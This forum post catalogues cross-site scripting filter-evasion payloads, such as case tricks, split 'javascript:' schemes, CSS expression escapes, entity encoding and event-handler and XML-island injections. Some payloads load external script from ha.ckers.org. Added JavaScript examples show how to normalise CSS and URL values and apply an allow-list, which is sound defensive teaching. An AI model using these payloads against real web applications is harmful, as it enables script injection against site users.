中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
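The point of sections 4 and 7 is that a filter which looks for the literal text "expression(" or "javascript:" in a raw STYLE value never sees it: the browser removes CSS comments and decodes backslash escapes before it interprets the value, and the filter does not. The defensive answer is to apply the same normalisation before checking. The following is an added example, not code from the original post; the function names (stripCssComments, decodeCssEscapes, normalizeCss, cssCarriesScript) and the marker list are this example's own choices, and the sample values are the STYLE attributes from section 7 above.

```javascript
// Added example (not from the original post): normalise a CSS value the way a
// browser does before deciding whether it carries active content.

// Pass 1: drop /* ... */ comments, but only outside quoted strings. The last
// section-7 payload contains the decoy string "*//*" precisely so that a
// string-unaware comment stripper eats the rest of the value.
function stripCssComments(css) {
  let out = "";
  let quote = null; // quote character we are currently inside, or null
  for (let i = 0; i < css.length; i++) {
    const c = css[i];
    if (quote) {
      out += c;
      if (c === "\\" && i + 1 < css.length) {
        out += css[++i]; // backslash-escaped character inside a string
      } else if (c === quote) {
        quote = null;
      }
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
    } else if (c === "/" && css[i + 1] === "*") {
      const end = css.indexOf("*/", i + 2);
      i = end === -1 ? css.length : end + 1; // unterminated comment runs to the end
    } else {
      out += c;
    }
  }
  return out;
}

// Pass 2: decode CSS backslash escapes. "\" followed by 1-6 hex digits (and an
// optional single whitespace) is a code point; "\" followed by anything else is
// that character itself, which is what turns "expre\ssi\on" into "expression".
function decodeCssEscapes(css) {
  return css.replace(/\\([0-9a-fA-F]{1,6})\s?|\\(.)/g, (m, hex, ch) => {
    if (hex === undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
  });
}

function normalizeCss(css) {
  return decodeCssEscapes(stripCssComments(css)).toLowerCase();
}

// Markers of active content, taken from the payload families on this page.
const ACTIVE_CSS = [/expression\s*\(/, /javascript\s*:/, /@import/];

function cssCarriesScript(rawValue) {
  const normalised = normalizeCss(rawValue);
  return ACTIVE_CSS.some((re) => re.test(normalised));
}

// Constructed sample set: the five section-7 STYLE values plus two benign ones.
const CSS_SAMPLES = [
  "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
  "xss:expre\\ssion(alert(\"XSS33\"))",
  "xss:expr/*anyword*/ession(alert('sss'))",
  "width: expre\\ssi\\on(alert('XSS31'));",
  "no\\xss:noxss(\"*//*\"); xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))",
  "width: 100px; background: url(/img/a.png) /* brand colour */",
  "color: red; font-family: 'Noto Sans'",
];

// Returns how many samples are flagged; the first five should be, the last two not.
function countFlagged(samples) {
  return samples.filter(cssCarriesScript).length;
}

for (const s of CSS_SAMPLES) {
  console.log(cssCarriesScript(s) ? "FLAGGED " : "ok      ", normalizeCss(s));
}
```

The two passes run in the order the browser applies them: comments are removed on the raw text, escapes are decoded afterwards. Comparing the normalised value against an allow-list of properties is stronger than the marker list used here, but the marker list is enough to show why the raw-text regex in section 7's target filter fails.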
8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an swf

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
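Sections 1, 6, 8 and 14 share one root cause: the attribute value a filter inspects is not the value the browser resolves. Before the URL parser looks at the scheme of src, href, url(...) or a refresh CONTENT="0;url=...", the HTML parser has decoded numeric entities (with or without the trailing ";"), and the URL parser has trimmed leading controls, removed tab/LF/CR anywhere in the string and compared the scheme case-insensitively. The check therefore belongs after that normalisation and should be an allow-list of schemes, not a search for the string "javascript:". The block below is an added example, not code from the original post; the function names, the http/https allow-list and the constructed inputs (tabs and newlines stand in for the gaps shown in section 6) are this example's own assumptions.

```javascript
// Added example (not from the original post): resolve the scheme of a URL-bearing
// attribute the way a browser does, then check it against an allow-list.

// HTML5 named entities that are used to hide scheme separators and whitespace.
const NAMED_ENTITIES = { tab: "\t", newline: "\n", colon: ":" };

// Decode &#xHH; / &#DD; / &Tab; &NewLine; &colon; entities. The ";" is optional
// because HTML parsers accept its absence, which is the trick section 8 relies on.
function decodeHtmlEntities(s) {
  return s.replace(
    /&#x([0-9a-f]{1,6});?|&#([0-9]{1,7});?|&(tab|newline|colon);?/gi,
    (m, hex, dec, name) => {
      if (name !== undefined) return NAMED_ENTITIES[name.toLowerCase()];
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : "\ufffd";
    }
  );
}

// Mirror the URL parser's pre-processing: strip leading/trailing C0 controls
// and spaces, and remove tab, LF and CR wherever they occur.
function normalizeUrl(raw) {
  return decodeHtmlEntities(raw)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme of the resolved URL in lower case, or null for a relative URL.
function urlScheme(raw) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(normalizeUrl(raw));
  return m ? m[1].toLowerCase() : null;
}

// Assumed policy for this example: only http(s) and relative URLs may be rendered.
const ALLOWED_SCHEMES = new Set(["http", "https"]);

function isSafeUrl(raw) {
  const scheme = urlScheme(raw);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed inputs: the section-14 form, the case trick (section 1), embedded
// tab/newline (section 6), hex entities with and without ";" (section 8), and
// two values that an allow-list must keep accepting.
const URL_SAMPLES = [
  "javascript:alert('XSS3')",
  "JaVaScRiPt:alert('XSS')",
  "jav\tascr\nipt:alert('XSS3')",
  "&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('abc')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#58alert('abc')",
  "https://example.com/a.png",
  "/static/a.png",
];

// Returns the number of samples the allow-list rejects (the first five).
function countRejected(samples) {
  return samples.filter((u) => !isSafeUrl(u)).length;
}

for (const u of URL_SAMPLES) {
  console.log(isSafeUrl(u) ? "allow  " : "reject ", JSON.stringify(u), "->", urlScheme(u));
}
```

The same isSafeUrl check applies to the argument of url(...) inside a STYLE value and to the url= part of a META refresh, since both end up in the URL parser. Because the decision is an allow-list on the resolved scheme, a new spelling of javascript: does not need a new filter rule; it is rejected by default.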

6 ~7 W5 }% T; ^9 T, l! X4 L& d




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2